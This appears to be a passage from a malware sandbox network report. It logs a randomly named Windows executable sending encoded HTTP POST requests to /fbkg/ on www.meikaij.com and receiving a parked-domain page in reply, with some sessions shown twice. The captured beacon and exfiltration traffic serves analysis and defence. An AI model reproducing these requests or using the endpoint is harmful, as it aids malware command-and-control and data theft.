                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487910032 CET1048INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjI0NmM2MTYtNzFiYy00ZmVmLTljZGMtOTdjYzE0YTMyY2E4IiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                48199.59.243.22580192.168.11.2050175C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:42.999169111 CET1049OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 72 2f 4e 41 6d 43 42 73 68 66 53 52 6b 70 4e 4c 4e 62 56 7a 6f 45 6a 54 43 39 74 56 64 37 2b 4e 32 46 68 42 32 79 73 70 42 6e 6e 6f 48 53 33 7a 52 46 37 71 76 66 52 71 4e 73 67 49 66 78 49 6e 59 43 47 39 66 31 66 70 4d 77 6b 67 38 45 6a 2b 78 42 47 76 4e 72 71 35 53 44 58 78 45 36 57 63 4a 72 79 76 48 52 58 46 30 71 62 59 6b 5a 68 33 77 49 41 4d 35 6b 37 74 56 2f 68 36 66 62 70 32 66 67 39 63 6e 50 52 6f 58 74 6d 53 4a 39 52 72 6b 54 71 48 35 61 64 6b 32 58 63 6d 48 44 72 6b 42 30 54 56 71 4a 67 7a 73 63 33 51 47 5a 55 61 2f 43 47 68 78 31 73 45 65 2f 6e 61 79 61 6e 53 4f 74 47 33 30 68 4f 79 41 36 68 66 72 30 65 53 5a 72 45 47 67 34 6e 69 2b 2b 53 4b 68 78 76 57 54 72 4e 45 59 6b 46 47 6e 74 54 39 6d 69 66 4d 69 44 4c 6c 37 58 6d 73 6e 75 2f 32 36 74 74 46 77 4e 4e 53 79 33 44 58 6e 56 59 63 37 7a 36 38 34 38 78 76 37 30 4d 47 4f 41 2f 31 6f 4b 42 6b 32 4a 64 4d 47 5a 34 63 6f 34 72 4f 4b 33 4f 39 59 79 79 49 2f 2f 65 73 33 49 75 53 51 49 72 37 53 65 2f 48 38 36 43 6f 6e 59 78 45 50 53 4b 4b 34 69 6c 34 37 4a 42 74 4e 37 54 4d 65 39 69 50 42 34 72 43 73 36 46 43 73 58 57 76 59 6d 46 73 74 66 54 37 75 76 49 58 4b 5a 4d 2f 50 5a 30 73 69 51 72 55 69 76 74 78 63 4c 55 45 46 71 31 34 71 47 55 35 6f 72 56 35 68 33 77 54 59 41 2b 32 6f 4c 51 79 30 39 6e 65 37 49 56 77 6d 4d 56 44 50 2b 43 76 6e 70 6a 2f 69 34 31 6e 77 75 44 50 2f 6c 74 35 7a 6d 78 58 6f 47 48 35 35 64 34 4a 39 56 5a 77 56 58 56 34 71 6c 6c 51 31 72 67 36 4f 6e 4c 5a 4b 35 59 4d 4c 34 4f 69 61 31 73 74 59 37 46 63 6c 77 6c 56 64 45 3d
                                                                                                                                                                                                Data Ascii: T6I=EttJ4+zVcoZjir/NAmCBshfSRkpNLNbVzoEjTC9tVd7+N2FhB2yspBnnoHS3zRF7qvfRqNsgIfxInYCG9f1fpMwkg8Ej+xBGvNrq5SDXxE6WcJryvHRXF0qbYkZh3wIAM5k7tV/h6fbp2fg9cnPRoXtmSJ9RrkTqH5adk2XcmHDrkB0TVqJgzsc3QGZUa/CGhx1sEe/nayanSOtG30hOyA6hfr0eSZrEGg4ni++SKhxvWTrNEYkFGntT9mifMiDLl7Xmsnu/26ttFwNNSy3DXnVYc7z6848xv70MGOA/1oKBk2JdMGZ4co4rOK3O9YyyI//es3IuSQIr7Se/H86ConYxEPSKK4il47JBtN7TMe9iPB4rCs6FCsXWvYmFstfT7uvIXKZM/PZ0siQrUivtxcLUEFq14qGU5orV5h3wTYA+2oLQy09ne7IVwmMVDP+Cvnpj/i41nwuDP/lt5zmxXoGH55d4J9VZwVXV4qllQ1rg6OnLZK5YML4Oia1stY7FclwlVdE=
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113601923 CET1051INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:42 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: c17b64c7-c4bc-4db6-8a4b-c62ceebf9491
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=c17b64c7-c4bc-4db6-8a4b-c62ceebf9491; expires=Fri, 17 Nov 2023 18:45:43 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113672972 CET1051INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzE3YjY0YzctYzRiYy00ZGI2LThhNGItYzYyY2VlYmY5NDkxIiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                48192.168.11.2050175199.59.243.22580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:42.999169111 CET1049OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 72 2f 4e 41 6d 43 42 73 68 66 53 52 6b 70 4e 4c 4e 62 56 7a 6f 45 6a 54 43 39 74 56 64 37 2b 4e 32 46 68 42 32 79 73 70 42 6e 6e 6f 48 53 33 7a 52 46 37 71 76 66 52 71 4e 73 67 49 66 78 49 6e 59 43 47 39 66 31 66 70 4d 77 6b 67 38 45 6a 2b 78 42 47 76 4e 72 71 35 53 44 58 78 45 36 57 63 4a 72 79 76 48 52 58 46 30 71 62 59 6b 5a 68 33 77 49 41 4d 35 6b 37 74 56 2f 68 36 66 62 70 32 66 67 39 63 6e 50 52 6f 58 74 6d 53 4a 39 52 72 6b 54 71 48 35 61 64 6b 32 58 63 6d 48 44 72 6b 42 30 54 56 71 4a 67 7a 73 63 33 51 47 5a 55 61 2f 43 47 68 78 31 73 45 65 2f 6e 61 79 61 6e 53 4f 74 47 33 30 68 4f 79 41 36 68 66 72 30 65 53 5a 72 45 47 67 34 6e 69 2b 2b 53 4b 68 78 76 57 54 72 4e 45 59 6b 46 47 6e 74 54 39 6d 69 66 4d 69 44 4c 6c 37 58 6d 73 6e 75 2f 32 36 74 74 46 77 4e 4e 53 79 33 44 58 6e 56 59 63 37 7a 36 38 34 38 78 76 37 30 4d 47 4f 41 2f 31 6f 4b 42 6b 32 4a 64 4d 47 5a 34 63 6f 34 72 4f 4b 33 4f 39 59 79 79 49 2f 2f 65 73 33 49 75 53 51 49 72 37 53 65 2f 48 38 36 43 6f 6e 59 78 45 50 53 4b 4b 34 69 6c 34 37 4a 42 74 4e 37 54 4d 65 39 69 50 42 34 72 43 73 36 46 43 73 58 57 76 59 6d 46 73 74 66 54 37 75 76 49 58 4b 5a 4d 2f 50 5a 30 73 69 51 72 55 69 76 74 78 63 4c 55 45 46 71 31 34 71 47 55 35 6f 72 56 35 68 33 77 54 59 41 2b 32 6f 4c 51 79 30 39 6e 65 37 49 56 77 6d 4d 56 44 50 2b 43 76 6e 70 6a 2f 69 34 31 6e 77 75 44 50 2f 6c 74 35 7a 6d 78 58 6f 47 48 35 35 64 34 4a 39 56 5a 77 56 58 56 34 71 6c 6c 51 31 72 67 36 4f 6e 4c 5a 4b 35 59 4d 4c 34 4f 69 61 31 73 74 59 37 46 63 6c 77 6c 56 64 45 3d
                                                                                                                                                                                                Data Ascii: T6I=EttJ4+zVcoZjir/NAmCBshfSRkpNLNbVzoEjTC9tVd7+N2FhB2yspBnnoHS3zRF7qvfRqNsgIfxInYCG9f1fpMwkg8Ej+xBGvNrq5SDXxE6WcJryvHRXF0qbYkZh3wIAM5k7tV/h6fbp2fg9cnPRoXtmSJ9RrkTqH5adk2XcmHDrkB0TVqJgzsc3QGZUa/CGhx1sEe/nayanSOtG30hOyA6hfr0eSZrEGg4ni++SKhxvWTrNEYkFGntT9mifMiDLl7Xmsnu/26ttFwNNSy3DXnVYc7z6848xv70MGOA/1oKBk2JdMGZ4co4rOK3O9YyyI//es3IuSQIr7Se/H86ConYxEPSKK4il47JBtN7TMe9iPB4rCs6FCsXWvYmFstfT7uvIXKZM/PZ0siQrUivtxcLUEFq14qGU5orV5h3wTYA+2oLQy09ne7IVwmMVDP+Cvnpj/i41nwuDP/lt5zmxXoGH55d4J9VZwVXV4qllQ1rg6OnLZK5YML4Oia1stY7FclwlVdE=
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113601923 CET1051INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:42 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: c17b64c7-c4bc-4db6-8a4b-c62ceebf9491
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=c17b64c7-c4bc-4db6-8a4b-c62ceebf9491; expires=Fri, 17 Nov 2023 18:45:43 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113672972 CET1051INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzE3YjY0YzctYzRiYy00ZGI2LThhNGItYzYyY2VlYmY5NDkxIiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                49199.59.243.22580192.168.11.2050176C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626696110 CET1054OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 72 2f 4e 41 6d 43 42 73 68 66 53 52 6b 70 4e 4c 4e 62 56 7a 6f 45 6a 54 43 39 74 56 64 7a 2b 4e 45 64 68 54 6e 79 73 37 78 6e 6e 32 58 53 32 7a 52 45 35 71 76 33 72 71 4d 51 61 49 63 46 49 6b 50 6d 47 2b 74 64 66 38 38 77 70 72 63 45 68 76 68 42 6f 76 4b 6a 2b 35 52 2f 48 78 30 65 57 64 4f 58 79 39 6d 52 51 59 55 71 64 59 6b 5a 39 68 41 49 2b 4d 35 67 56 74 56 44 68 36 64 66 70 33 75 63 39 50 45 58 52 6c 6e 74 35 63 70 39 4f 69 45 54 6c 48 35 50 71 6b 32 58 71 6d 43 37 72 6b 47 49 54 55 72 4a 6a 7a 4d 63 33 66 57 5a 58 4c 71 61 43 68 33 52 6b 45 64 6a 6e 61 77 61 6e 51 75 74 47 38 78 42 50 31 67 36 6e 4f 62 30 33 66 35 6e 63 47 67 38 7a 69 37 6d 53 4c 58 64 76 58 67 44 4e 47 38 51 46 45 48 74 52 7a 47 69 32 48 43 44 50 6c 36 37 63 73 6a 62 4b 32 34 68 74 45 51 74 4e 58 54 33 63 44 33 56 65 53 62 79 67 34 34 34 6c 76 2f 6f 49 47 4f 41 57 31 70 4f 42 6c 46 52 64 50 48 5a 2f 61 34 34 73 47 71 33 66 33 34 4f 6f 49 37 65 54 73 33 77 41 53 53 6b 72 36 79 65 2f 43 66 53 42 78 6e 59 79 5a 66 54 57 48 59 69 32 34 37 56 33 74 4a 6a 63 50 74 70 69 4f 79 51 72 49 63 36 47 47 4d 58 53 6b 34 6d 48 68 4e 66 54 37 75 7a 32 58 4b 64 4d 34 2b 68 30 71 56 38 72 43 44 76 74 7a 63 4b 52 45 46 71 6b 34 71 4c 69 35 6f 7a 72 35 68 48 4f 54 61 73 2b 33 39 76 51 78 31 39 6f 4f 37 4a 66 30 6d 4d 34 64 2f 7a 4b 76 6e 31 52 2f 69 6f 66 6e 69 61 44 4f 38 64 74 39 7a 6d 32 52 49 47 41 76 70 63 78 66 39 5a 37 77 56 4b 6f 34 70 34 2b 51 30 50 67 37 50 47 48 4a 6f 4a 55 4f 4c 59 31 67 4b 74 2b 6e 35 2b 4b 59 45 67 44 42 49 4a 32 79 30 66 56 55 30 4b 73 4a 2f 42 68 4c 4d 44 7a 34 30 48 68 59 72 57 4c 4c 45 6b 55 4c 39 57 41 48 42 55 4f 58 34 4d 71 37 61 43 41 51 34 75 49 65 72 4c 59 7a 6b 47 6f 49 67 31 38 79 58 6c 56 31 36 4e 35 39 31 50 61 69 41 66 4f 2f 6b 4c 56 7a 53 30 59 38 56 4c 64 50 75 50 58 46 4d 77 37 7a 64 50 75 45 36 65 54 6c 32 57 34 42 54 42 50 46 32 55 4f 51 66 51 6d 78 62 4f 4f 4e 58 59 32 5a 72 49 57 4a 32 4a 38 4b 55 59 6c 61 42 51 69 62 48 35 54 39 67 72 72 6e 64 36 66 78 77 62 42 46 32 4d 6f 31 4a 4c 2f 56 4c 37 6e 33 39 4f 79 39 46 46 46 33 30 6a 6b 45 4e 31 70 58 46 6d 65 61 78 30 4e 59 33 73 69 6a 45 58 30 51 32 69 2b 75 6b 6f 4b 67 4c 6d 34 63 43 7a 76 67 53 7a 49 34 68 62 70 4c 43 72 45 41 2f 68 37 76 6f 31 68 6c 2f 54 4e 44 79 39 2b 41 64 4a 68 77 58 4d 42 37 6c 54 58 5a 48 69 64 41 71 56 4b 4c 4c 48 70 76 32 58 48 65 58 6e 46 75 79 43 35 36 69 42 6d 6a 7a 2f 4f 6c 76 34 55 69 32 2b 58 74 4d 49 49 47 33 61 64 42 75 63 2b 2b 54 51 36 36 53 65 31 5a 6a 68 6d 46 35 38 30 5a 37 4d 6e 5a 4d 32 7a 74 77 56 74 2f 32 32 68 45 35 39 6c 59 32 52 56 69 48 43 64 51 6b 6c 55 61 36 50 45 39 52 62 30 34 34 37 5a 47 70 59 61 38 5a 76 7a 61 68 4c 31 78 59 39 75 41 39 65 55 53 30 53 43 53 35 67 65 72 67 58 50 66 48 73 41 4a 72 4c 4c 47 4d 64 31 75 46 44 4d 73 74 57 70 79 52 6e 79 5a 70 6e 41 6d 5a 48 74 52 56 70 49 61 6b 7a 7a 4b 50 32 34 37 53 68 71 55 4a 73 4c 2b 44 34 5a 58 31 64 47 4a 68 49 36 67 50 70 36 4a 5a 6a 4f 51 63 75 42 34 47 58 2f 69 4b 4b 51 51 35 41 39 34 37 6e 72 70 68 41 2b 6d 33 6b 30 58 4d 6d 4a 32 77 30 72 33 71 30 39 57 56 51 2f 43 63 4b 6b 4e 46 31 72 43 57 6e 44 6a 41 41 61 4f 57 53 39 35 6d 5a 2b 6d 48 5a 46 77 39 4e 74 36 7a 33 51 46 34 33 58 57 56 47 4c 34 4e 61 6e 58 57 37 49 53 52 54 4a 34 34 79 71 63 52 6a 63 6a 5a 6f 75 41 37 49 4b 78 65 6e 35 4e 4f 4a 69 49 36 52 33 7a 6d 4e 54 62 71 32 47 6a 78 75 44 53 78 55 2f 53 59 4a 6c 75 77 33 30 68 42 4a 73 39 44 6c 34 39 59 72 62 45 62 78 42 66 52 48 6e 55 62 53 4e 53 